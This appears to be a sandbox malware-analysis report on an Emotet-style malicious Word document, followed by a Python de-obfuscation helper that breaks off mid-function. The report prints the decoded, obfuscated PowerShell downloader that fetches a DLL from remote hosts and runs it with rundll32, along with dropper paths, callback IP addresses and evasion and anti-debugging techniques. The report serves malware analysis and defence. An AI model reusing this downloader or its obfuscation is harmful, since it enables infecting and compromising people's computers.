Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: Informacion_4-09757.doc Metadefender: Detection: 36%
Source: Informacion_4-09757.doc ReversingLabs: Detection: 75%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2101464007.000000001B3D0000.00000002.00000001.sdmp
Source: Informacion_4-09757.doc Initial sample: OLE summary subject = withdrawal yellow Australia Credit Card Account Alabama connecting Jamaican Dollar Configuration Wooden Extension copy Marshall Islands ivory Rubber

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Informacion_4-09757.doc Stream path 'Macros/VBA/Qfepbztq9r8o1l76' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Qfepbztq9r8o1l76 Name: Qfepbztq9r8o1l76
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_10013BFB
PE file contains an invalid checksum
Source: Yvtlx6p4.dll.5.dr Static PE information: real checksum: 0x4a297 should be: 0x40b13
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B0BD push ecx; ret 7_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007BCA push ecx; ret 7_2_10007BDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FCE92 push cs; retf 7_2_001FCE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0019CE92 push cs; retf 9_2_0019CE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ACE92 push cs; retf 10_2_001ACE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001ECE92 push cs; retf 15_2_001ECE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_001ECE92 push cs; retf 16_2_001ECE94

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Ocet\gyzufj.pjr

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ocet\gyzufj.pjr:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mylz\dnoauh.fda:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Skqv\bpgr.lft:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Eeay\tsbyty.hpi:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jfjk\etjwcl.eoy:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fpxy\zbyjv.xxd:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xcmo\muvihv.sjs:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (28 occurrences)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (this value is [TimeSpan]::MaxValue expressed in milliseconds, Int64.MaxValue ticks / 10000, i.e. an effectively unbounded sleep)
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation (9 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2095369580.0000000000367000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow (ShowWindow repeated a few hundred more times; the report truncates the list) 7_2_10002460
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10007528
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_10013BFB
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F6AB2 mov eax, dword ptr fs:[00000030h] 7_2_001F6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_007176B2 mov eax, dword ptr fs:[00000030h] 8_2_007176B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00196AB2 mov eax, dword ptr fs:[00000030h] 9_2_00196AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001A6AB2 mov eax, dword ptr fs:[00000030h] 10_2_001A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002676B2 mov eax, dword ptr fs:[00000030h] 11_2_002676B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002276B2 mov eax, dword ptr fs:[00000030h] 13_2_002276B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F76B2 mov eax, dword ptr fs:[00000030h] 14_2_001F76B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001E6AB2 mov eax, dword ptr fs:[00000030h] 15_2_001E6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_001E6AB2 mov eax, dword ptr fs:[00000030h] 16_2_001E6AB2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10004500
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10007528
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10009F26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10006F64

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 167.71.148.58 187
Encrypted powershell cmdline option found (the -ENCOD argument is base64 over UTF-16LE script text, so it is encoded rather than encrypted and decodes without a key)
Source: unknown Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
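The decoded script above is the usual Emotet downloader layout: .NET type names assembled with the -F format operator, strings built from concatenated fragments, method names broken up with backticks, and path separators hidden behind a throw-away delimiter that is swapped for [char]92 (a backslash) at run time. The Python below is an added example and is not part of the Joe Sandbox report: it decodes the first 184 base64 characters of the -ENCOD argument the report prints (UTF-16LE under base64) and statically folds three statements copied from the decoded script. It assumes $HOME is C:\Users\user, the profile the sandbox shows, and uses the already-folded value of $Ka0ekfa; the folding is a regex normaliser for exactly these idioms, not a PowerShell parser, and it never executes anything from the sample.

```python
r"""De-obfuscate the Emotet PowerShell stage shown in this report.

Added example, not part of the sandbox report. Inputs copied from the report:
the first 184 base64 characters of the -ENCOD argument (the report truncates
the rest) and three statements of the decoded script. $HOME = C:\Users\user
is assumed from the paths the sandbox shows; everything else is derived.
"""
import base64
import re

ENCOD_PREFIX = ("IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9"
                "AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQA"
                "bwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsA")

# Statements copied from the decoded script in the report.
TYPE_STMTS = r"""$F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR')"""
DIR_STMT = r"""($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92))"""
DLL_STMT = r"""$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll')"""

# Assumed: the sandbox profile path, and $Ka0ekfa = (('Yvtl'+'x')+'6p'+'4') pre-folded.
VARIABLES = {"HOME": r"C:\Users\user", "Ka0ekfa": "Yvtlx6p4"}

_TICK = re.compile(r"`(?![0abfnrtv])")                  # drop obfuscating backticks, keep `n `t ... escapes
_JOIN = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")        # 'a'+'b'  ->  'ab'
_PAREN = re.compile(r"(?<![\w\]])\(\s*('[^']*')\s*\)")   # ('a') -> 'a', unless it is a cast/call argument
_FMT = re.compile(r"\"([^\"]*)\"\s*-F\s*((?:'[^']*'\s*,\s*)*'[^']*')", re.I)  # "{1}{0}" -F 'b','a'
_DASH_REPLACE = re.compile(r"'([^']*)'\s*-replace\s*\(?\s*'([^']*)'\s*\)?\s*,\s*\[char\]\s*(\d+)", re.I)
_METHOD_REPLACE = re.compile(r"'([^']*)'\s*\.\s*\"?replace\"?\s*\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand (abbreviated -ENCOD here) carries base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def fold_strings(src):
    """Statically fold the string-building idioms until the text stops changing."""
    def fmt(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        return "'" + m.group(1).format(*args) + "'"   # PowerShell -f and str.format agree on {n}
    prev = None
    while prev != src:
        prev = src
        src = _TICK.sub("", src)
        src = _JOIN.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        src = _PAREN.sub(r"\1", src)
        src = _FMT.sub(fmt, src)
    return src


def apply_replaces(src):
    """Evaluate the delimiter substitutions that hide path separators (-replace is regex based)."""
    src = _DASH_REPLACE.sub(
        lambda m: "'" + re.sub(m.group(2), lambda _: chr(int(m.group(3))), m.group(1)) + "'", src)
    src = _METHOD_REPLACE.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", src)
    return src


def resolved_type_names(stmt):
    """Return, lower-cased, the .NET type names hidden behind [type]("{n}{m}..." -F ...) casts."""
    return [t.lower() for t in re.findall(r"\[type\]\s*\(?\s*'([^']*)'", fold_strings(stmt), re.I)]


def resolve_expression(expr, variables):
    """Substitute known variables, fold, and return the resulting string value."""
    src = re.sub(r"\$(\w+)",
                 lambda m: "'" + variables[m.group(1)] + "'" if m.group(1) in variables else m.group(0),
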